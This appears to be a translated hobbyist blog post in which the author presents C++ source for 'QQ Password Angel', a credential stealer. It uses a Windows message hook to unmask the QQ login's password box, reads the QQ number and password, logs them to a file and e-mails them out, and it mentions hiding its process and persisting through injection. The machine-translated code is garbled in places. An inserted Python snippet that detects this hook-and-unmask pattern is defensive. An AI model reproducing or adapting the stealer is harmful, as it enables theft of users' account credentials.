Let me state up front that I wrote this program purely out of interest, as a summary of my own studies! The program has not been published; after all, it is at least a little harmful! It is only called "Password Angel" (hee hee) as a figure of speech: it takes note of so many IDs and passwords that it naturally has a bit of the angel in it! Hee hee ~~~~~

The program's interface when running is shown in Figure 1.

The program offers pseudo-hiding of its process (version 1.1 can hide it), a hotkey to call up its window, e-mail sending, and other functions. It has two parts, an EXE and a DLL; the DLL is there for the hook. Because QQ keeps changing from version to version, the program identifies the QQ window by searching for it. Different QQ versions need different checks, however: the check below, which looks for the "Clear ..." button, is effective only for that kind of QQ version. (Thanks here to Titilima for the help!) The program stays resident in memory, and I use the Timer event to monitor for the QQ window. The relevant part of the program is as follows:
HWND G_HQQ; // qq window handle
Void cgetqqworddlg :: Ontimer (uint nidevent)
{
IF (! iswindow (g_hqq))
{
HWnd hsend; // "Login" sub-window handle
HWND HNEXT; / / "Next" sub-window handle
G_HQQ = NULL;
m_hook.starthook (null);
DO
{
g_hqq = findwindowex (NULL, G_HQQ, "# 32770", null);
Hsend = FindWindowEx (G_HQQ, NULL, "Button", "Clear ...");
HNEXT = FindWindowEx (G_HQQ, NULL, "Button", "Next (& N)>");
}
While (g_hqq! = null && hsend == null && hnext == NULL);
IF (g_hqq! = null) // Discover QQ window
{
m_hook.starthook (g_hqq); // Set hook
}
}
}
After the hook is set, execution moves into the DLL that comes with the program. If there is anything in it worth a look, I would welcome pointers from everyone! I wrapped setting and removing the hook in a class, CGETQHOOK. Object-oriented programming has its advantages, as you can see when you analyze it:
Bool cgetqqide :: StartHook (hwnd hqq)
{
IF (hqq! = null)
{
SHQQ = HQQ; // Change the value of SHQQ in the shared section DWORD DWTHREADID = getWindowThreadProcessID (hqq, null); // Get the thread ID in QQ
Hproc = setwindowshookex (wh_callwndproc, caverwndproc, glhinstance, dwthreadid); //
IF (HPROC)
Return True;
}
Else
{
Stophook ();
}
Return False;
}
The hook I use is WH_CALLWNDPROC. Before the operating system delivers a message to the process's window procedure, the message passes through the hook, where I check whether it is a button message. If it is, I enumerate the child windows of the current main window and find the ones that have the characteristics of the password and user fields. (I used Spy++ to find and record the button ID.) OK! Doesn't it feel as if more than half the work is done?
hwnd hwd = null; //
LResult WinAPI CallWndProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
IF (ncode == hc_action)
{
CWPSTRUCT * P = (cwpstruct *) LPARAM;
HWND htargethwnd = shqq; // Detection handle if (p-> message == wm_command) // capture command
{
IF ((P-> WPARAM) == 1) || (Loword (P-> WPARAM) == 0x00003024)) {
IF (hw == null)
{
HWD = SHQQ;
:: EnumchildWindows (HtargethWnd, EnumWndProc, 0);
}
IF (hwd == shqq) // if it is the same window
Return CallNexthookex (HProc, Ncode, WPARAM, LPARAM);
}
}
Return CallNexthookex (HProc, Ncode, WPARAM, LPARAM);
}
During enumeration, if a window is the password box, its password property is removed first and then its content is read (otherwise there is trouble under NT systems). There is one more very important issue: because a sending function is used, the call to it stalls once 10 passwords have been recorded, so I start a separate thread to lessen this effect.
Bool WinApi EnumWndProc (HWND HWND, LPARAM LPARAM)
{
Char swindowclass [256];
Cstring strwindowclass;
CString strwindowname;
:: getClassName (HWND, SWINDOWCLASS, 256);
StrwindowClass.ReleaseBuffer ();
StrwindowClass = SWINDOWCLASS;
OFSTREAM Fout;
Char cpath [512];
:: GetCurrentDirectory (512, CPATH);
Strcat (cpath, _t ("// kk.txt"))); // Remember, the current directory is the directory IF in QQ (StrWindowClass ==_T ("Edit"))
{
For (int i = 0; i <10; i )
{
Strwindowname = SWINDOWNAME [i];
IF (strwindowname.getlength () == 0)
Break;
}
IF (i <10) // has data from 0 to i's character array
{
Fout.Open (cpath, ios :: app);
DWORD style = getWindowlong (hwnd, gwl_style);
IF (Style & Es_Password)
{
Long NTYPE;
NTYPE = SendMessage (hwnd, em_getpasswordchar, 0, 0); PostMessage (hwnd, em_setpasswordchar, 0, 0); Sleep (100); // Stop 100 millisecond sendMessage (hwnd, wm_gettext, 256, (lparam) SWindowname [i]) Postmessage (hwnd, em_setpasswordchar, ntype, 0); fout << "Password:"; fout << Swindowname [i] << "/ n";
}
Else
{
IF ((Style & Es_Readonly) && (Style & WS_Visible))
{
:: SendMessage (hwnd, wm_gettext, 256, (lparam) SWINDOWNAME [I]);
Fout << "QQ number:"; fout << Swindowname [i] << "/ t / t";
}
}
Fout.close ();
}
Else
{
For (int K = 0; k <10; k )
STRCPY (STEMP [K], SWINDOWNAME [K]);
MEMSET (SWindowname, 0, 10 * 256);
AfxBeginthread (SendmailUseridpass, Null, Thread_Priority_NORMAL);
:: EnumchildWindows (:: getParent (hwnd), enumwndproc, 0);}
}
Return True;
}
// Full-time thread function
Uint SendmailUseridPass (LPVOID PPARAM)
{
Sendmyqqinfo (); // Send your password, ID
Return 0;
}
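From the defender's side, the behaviour described above leaves a recognisable trace: a WH_CALLWNDPROC hook installed on a thread of another process, then a password edit control unmasked with EM_SETPASSWORDCHAR and read with WM_GETTEXT. The following Python detector is an added example, not part of the original program; the API-trace record layout, its field names and the 2000 ms window are assumptions, and the sample trace is constructed.

```python
# Added example: flag the hook-and-unmask pattern in an API-call trace.
# The record layout (t, api, ...) is hypothetical; the sample trace is constructed.
WH_CALLWNDPROC = 4           # Win32 hook type used by the page's DLL
EM_SETPASSWORDCHAR = 0x00CC  # wparam 0 removes the masking character
WM_GETTEXT = 0x000D
WINDOW_MS = 2000             # assumed maximum gap between unmask and read


def detect(events):
    """Return (kind, time_ms, subject) tuples for suspicious behaviour."""
    findings = []
    unmasked = {}  # hwnd -> time at which its masking was cleared
    for ev in sorted(events, key=lambda e: e["t"]):
        api = ev["api"]
        if api == "SetWindowsHookEx":
            # A message hook aimed at a thread of a different process
            # loads the caller's DLL into that process.
            if ev["id_hook"] == WH_CALLWNDPROC and ev["caller_pid"] != ev["target_pid"]:
                findings.append(("cross_process_hook", ev["t"], ev["target_pid"]))
        elif api in ("SendMessage", "PostMessage"):
            hwnd, msg = ev["hwnd"], ev["msg"]
            if msg == EM_SETPASSWORDCHAR:
                if ev.get("wparam", 0) == 0:
                    unmasked[hwnd] = ev["t"]
                else:
                    unmasked.pop(hwnd, None)  # masking restored
            elif msg == WM_GETTEXT and hwnd in unmasked:
                if ev["t"] - unmasked[hwnd] <= WINDOW_MS:
                    findings.append(("password_field_read", ev["t"], hwnd))
    return findings


SAMPLE_TRACE = [  # constructed events, times in milliseconds
    {"t": 10, "api": "SetWindowsHookEx", "id_hook": 4, "caller_pid": 500, "target_pid": 500},
    {"t": 900, "api": "SetWindowsHookEx", "id_hook": 4, "caller_pid": 812, "target_pid": 2040},
    {"t": 1400, "api": "SendMessage", "hwnd": 0x30A, "msg": WM_GETTEXT},  # ordinary read
    {"t": 1500, "api": "PostMessage", "hwnd": 0x30C, "msg": EM_SETPASSWORDCHAR, "wparam": 0},
    {"t": 1600, "api": "SendMessage", "hwnd": 0x30C, "msg": WM_GETTEXT},
    {"t": 1601, "api": "PostMessage", "hwnd": 0x30C, "msg": EM_SETPASSWORDCHAR, "wparam": 0x2A},
    {"t": 5000, "api": "SendMessage", "hwnd": 0x30C, "msg": WM_GETTEXT},  # after re-mask
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_TRACE):
        print(finding)
```

The same-process hook at t=10 and the reads of windows that are not unmasked are deliberately left unflagged, which keeps ordinary UI automation and accessibility reads out of the results.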
At this point, the main part of the program is complete! But when you look at my source code, you will find that I have a lot of comments around the shared data segment, because I ran into some setbacks there while writing this program. If sharing data is not clear to you, I suggest reading Titilima's masterpiece "The Implementation of 'QQ Tail Virus' Core Technology", which describes some details of the shared data section vividly:
http://home.nuc.edu.cn/-titilima/readArticle.php?id=23
Later, in QQ Password Angel V1.1, I used memory mapping instead, because I find that when multiple DLLs and an EXE share data, passing it through a memory mapping is clearer!
#Pragma data_seg ("wenboly")
HHOOK HPROC = NULL; / / Monitor the hook of a specific message
HWND SHQQ = NULL; // QQ handle char swindowname [10] [256] = {0};
#pragma data_seg ()
These variables are placed in the shared section, which is shared by the EXE and the DLL, so a change to them takes effect everywhere they appear (a bit like a static variable).
For the mail-sending part I use someone else's class library, which I will not explain here. If you are interested in STL development, this class library is good material to study!
In addition, the program has read and write operations, a window that starts hidden, and a hotkey for the window; for reasons of space I will not go into them here. Also, in version 1.1 I use process injection (not remote process injection) to let the EXE come back from the dead! Shortcomings are inevitable; I hope you will bear with me! ® MINIKING